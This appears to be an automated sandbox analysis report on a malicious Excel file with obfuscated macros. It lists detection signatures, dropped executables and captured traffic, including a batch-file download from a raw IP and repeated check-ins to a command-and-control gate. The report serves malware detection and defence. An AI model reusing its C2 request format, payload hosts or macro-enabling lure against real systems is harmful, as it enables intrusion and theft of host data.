Analysis Report 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Overview

General Information

Sample Name: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
Analysis ID: 335896
MD5: 4468e0175c68f3751fc2027f1e42ca0c
SHA1: c19aff367853c61d750b2da47623b69d8c1b42bb
SHA256: 4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Found C&C like URL pattern
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

AV Detection:

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ps.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49172 -> 172.67.167.122:80
Found C&C like URL pattern
Source: global traffic HTTP traffic detected: POST /cc/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: http generic Host: cryptodual.net Content-Length: 87 Cache-Control: no-cache Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Source: global traffic HTTP traffic detected: POST /cc/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: http generic Host: cryptodual.net Content-Length: 87 Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161 Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1 Host: 37.46.150.139 Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.8.238
Source: Joe Sandbox View IP Address: 37.46.150.139
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1 Host: 37.46.150.139 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: unknown HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.c
Source: powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanenTZ
Source: powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 0 Screenshot OCR: Enable Content from the yellow bar above
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 1 Screenshot OCR: Enable Content from the yellow bar above
Found Excel 4.0 Macro with suspicious formulas
Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ps.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\ps.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AD1DF6 NtQuerySystemInformation, 24_2_00AD1DF6
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AD1DC5 NtQuerySystemInformation, 24_2_00AD1DC5
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_01F31D66 NtQuerySystemInformation, 32_2_01F31D66
Source: C:\Users\user\AppData\Roaming\svchost.exe Code function: 32_2_01F31D30 NtQuerySystemInformation, 32_2_01F31D30
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_004A0F79 24_2_004A0F79
